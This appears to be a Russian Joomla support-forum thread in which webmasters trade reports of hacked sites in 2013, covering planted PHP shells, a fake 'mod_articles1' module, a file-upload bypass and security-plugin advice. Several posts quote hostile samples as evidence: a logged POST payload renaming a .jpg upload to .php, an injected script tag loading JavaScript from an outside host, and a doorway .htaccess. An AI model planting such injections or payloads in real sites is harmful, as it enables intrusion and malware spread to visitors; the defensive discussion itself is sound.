Новости Joomla

Joomla официально признана цифровым общественным благом Joomla с гордостью сообщает, что была...

Joomla официально признана цифровым общественным благом 🙏🎉Joomla с гордостью сообщает, что была официально признана цифровым общественным благом (Digital Public Good, DPG) Альянсом цифровых общественных благ (Digital Public Goods Alliance, DPGA) — инициативой, поддерживаемой Организацией Объединённых Наций.Это признание ставит Joomla! в ряд международных open-source проектов, которые разделяют ценности открытости, прозрачности, защиты данных и социального воздействия. Важно отметить, что статус цифрового общественного блага присвоен самому программному решению Joomla!, а не организации Joomla как юридическому лицу.Альянс цифровых общественных благ (DPGA) ведёт международный реестр цифровых общественных благ и оценивает проекты на основе чётко определённых стандартов. Его миссия — поддержка открытых технологий, способствующих достижению Целей устойчивого развития ООН (UN SDGs) и решению глобальных задач развития. 🌐Чтобы получить статус цифрового общественного блага, проект должен соответствовать Стандарту цифровых общественных благ (Digital Public Goods Standard), который включает следующие критерии:✔️ Открытое лицензирование (например, использование признанных open-source лицензий)✔️ Защита данных и безопасность✔️ Соответствие правовым и этическим нормам✔️ Вклад в достижение Целей устойчивого развития ООН✔️ Прозрачное управление и долгосрочная устойчивость✔️ Активное вовлечение сообществаПолучение статуса цифрового общественного блага — процесс далеко не автоматический. Joomla прошла тщательную процедуру оценки, которая потребовала предоставления подробной документации и доказательств соответствия строгим стандартам.Благодаря самоотверженной работе множества участников сообщества, этот результат стал наглядным подтверждением универсальности и открытости Joomla, а также бесчисленных способов, с помощью которых она помогает людям создавать веб-решения.Это достижение подчёркивает позицию Joomla как одной из самых надёжных и гибких open-source CMS в мире — системы, которая продолжает давать возможность разработчикам, организациям и государственным структурам создавать открытые, безопасные и инклюзивные цифровые решения.Оригинал новости

0 Пользователей и 4 Гостей просматривают эту тему.
  • 678 Ответов
  • 266893 Просмотров
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Ну её мое уже и до моего VDS добрался...
Сегодня зашел на аккаунт Gmail - в папке Spam обнаружил 3500 писем с домена, к которому привязан ящик.
Формат писем:

Спойлер
[свернуть]
Файл 7c334.php содержал что то наподобие:
Спойлер
[свернуть]
Прибил гада.

Компроментирован  ли теперь пользователь  VDS? В заголовках проскакивает что то про FreeBSD - я должен что то сообщить хостеру?
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
А что хостер, отпишет про проблемы со скриптами сайта.
Ищи шелл в файлах сайта. Владельцы файлов сайта разные на VDS ?
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Про пользователя - может да, а может и нет. Логи доступа могут подсказать. Скорее всего взломан именно сайт. Вы про root или пользователя аккаунта?
Я про пользователя аккаунта. Сам понимаю что "ступил" повесив одного пользователя на все домены, ща придется переделывать...
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Тут только лог доступа подскажет что-то. Да, на одного не надо было.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Опять мне повезло, в ходе дальнейшего расследования проводимого моими силами и силами хостера (за что ему отдельное спасибо), на VDS был обнаружен модуль маскирующийся под модуль статей /modules/mod_articles1/
В составе:
mod_articles1.xml
Спойлер
[свернуть]
7c334.php
Спойлер
[свернуть]
mod_articles1.php
Спойлер
[свернуть]
« Последнее редактирование: 31.07.2013, 09:28:40 от flyingspook »
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

sokol-iz-ussr

  • Захожу иногда
  • 90
  • 0 / 0
Вот ведь засранцы - такой баг прозевали, а я думаю какого лешего кто то загружает на мои сайты всягое Г
(Перевод: Недостаточная фильтрация приводит к возможности обхода ограничений на загрузку файлов.)

что это? в Joomla - Joomla! 2.5.8 есть такой баг?
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Версии: 2.5.13 и более ранние версий 2.5.x. 3.1.4 и более ранние версий 3.x.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
Я на хостинге поставил крон-задание (присылать отчет 1р в сутки) чтобы сканировал public_html на предмет появления новых файлов .php , .html, .gif

Сегодня ночью закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

вроде все пообновлял, месяц была тишина, а тут опять дырку нашли :(
как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке, если голосовалку можно удалить, то что вот делать с библиотекой :( походу это глобальная уязвимость в Joomla.

п.с. Joomla 2.5.13 + adminexile + jHackGuard + marcosinterceptor11j16
причем jHackGuard и marcosinterceptor11j16 вообще не прислали никакого отчета о проникновении
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Надо бы обновить сначала Joomla до 2.5.14 , а то вроде там что-то нашли. А шелл могли при желании куда угодно залить. Сколько сайтов на аккаунте?
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...

Спойлер
[свернуть]
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
эти черти уже в открытую продают, во черти-то
щас учащиеся общеобразовательных учреждении накупят и третья волна попрет... или какая там уже...


опасно тем что их машины станут ботами, а они бараны ни чего не сломают, хотя этот брут на плохих каналах работать только как ddos будет, хостеров жалко да и сайтам достанется, будут в дауне вместе с серверами

сами то не брутят с ПК-шек, просто ботсеть решили нарастить еще и заработать, маркетинг, красаВЧеки
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Сегодня просматривая страницы в индексе яндекса нашел у себя:
В /libraries/mosets/profilepicture/file
Аккуратненько так пачечька страничек сложена - заархивировал, прикладываю к посту, может кому интересно покопаться будет.
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
закачали 2 шелла
/home/****/public_html/site1/components/com_acepolls/xmikm3.php
/home/****/public_html/site2/libraries/cms/version/umps75.php

как я понял нашли дырку в компоненте голосовалка acepolls и в библиотеке
Вывод о локализации уязвимости в конкретных скриптах сделан по анализу логов взлома?
Или по тому, в какую директорию хоста засунули шелл? Второй вариант действий ошибочен.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
WebDisaster, логов нету. подумал куда залили, там и дырка.
прогнал сайты файликом fls.php, шеллов не нашел, только такие
File: /home/***/public_html/site2/libraries/cms/version/version_sys.php
String:: $_POST[
File: /home/***/public_html/site2/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

wishlight, 3 сайта. обновился до 2.5.14


Еще вот нашел старые логи jhackguard

Спойлер
[свернуть]
что это значит? в каких папках что где менялось/делалось?
« Последнее редактирование: 16.08.2013, 14:02:55 от mj23 »
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
опять таже картина
/home/***/public_html/site1/components/com_acepolls/2nzm91.php
/home/***/public_html/site2/libraries/cms/version/b3ybhf.php
в те же папки.
за день до появления файлов jhackguard-log
#Fields: datetime   priority   category   message
2013-08-22T18:16:17+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm5643g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm5643g.php"]}
2013-08-22T18:16:19+00:00   CRITICAL   jhackguard   Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"./im6713n5g.jpg\",\"./wthm9288g.php\"]} to:{"fn":"folderRename","args":["./im6713n5g.jpg","./wthm9288g.php"]}

п.с. Joomla 2.5.14 +adminexile + jHackGuard + marcosinterceptor11j16

буду пробовать ставить акиба админ тулс про
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Лучше поставьте то, что будет отслеживать модификацию и добавление файлов, а потом смотрите по логу сервера, как это делается. И главное - никакого вареза. JHacker Watch или Eyesite. По возможности обновить все расширения. Желательно просканировать сайты ai-bolit.
*

mj23

  • Осваиваюсь на форуме
  • 28
  • 2 / 0
wishlight, спасибо! ai-bolit'ом вычистил около 50  левых index.php, как раз в тех папках куда закачивают шеллы находились файлы version_sys.php и com_acepolls.php с одинаковым содержимым
по мимо этого в некоторые JPG был вставлен вредоносный код.
вообщем целый день потратил на чистку. будем надеяться поможет.
до ai-bolit содержимое проверял скриптом fls.php и он ничего подобного не обнаружил.
« Последнее редактирование: 27.08.2013, 13:45:15 от mj23 »
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
6.09 вечером 5 писем получил.атака на сайт, где нет cuhena
Спойлер
[свернуть]
IP забанил в nginx .
А на сайте клиента, где стоит cuhena , был только один запрос с этого же IP 94.228.220.68
-> POST /option=com_kunena
*

wishlight

  • Гуру
  • 5071
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Вот ведь скоты!
Во всех сайтах что на WP что на Joomla за 3 последних дня внедрение идет <script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script> прямо перед тегом <body>
Админки везде прикрыты, файлы 644, папки 755. КАК? Неуж то кто то учетку уже взломал по FTP. У меня скоро мания преследования начнется.
Пошел менять пароли где только можно... Грусть... Печаль... >:(
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
VPS ? с разными аккаунтами для всех сайтов?
А зачем ftp, а SSH ?
3 сайта все еще на одном акке
SSH - отключил еще 2 месяца назад на всех аккаунтах.
Вирус очень как то он хитро прописывает свой JS в блок head всех файлов index.php:
Код
<script language="JavaScript" src="http://stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>
Пишется походу регуляркой, так как скрипт четко всегда появляется перед </head>
Сегодня нашел папочки в корне сайтов - названия разные (cigarette и т.п.)
Папка  - права 777
В папке 2 файла:
.htaccess
Код
RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule index.php.* - [L]

RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*) index.php?id=$1



index.php

Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Да, походу прописывается везде где найдет </head>  :'( Блин.
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
Мелкий ремонт. skype poisk-plus
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Для того, чтобы эти файлы грузились на сайт, где то оставлена "дыра". Ищите ее. До тех пор, пока не заделаете дыры, взломы продолжаться.
да, вы правы.
Хостер нашел сегодня дыры:
Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3047
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3357
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2694
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1003
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2355
Последний ответ 03.11.2020, 17:36:03
от Cedars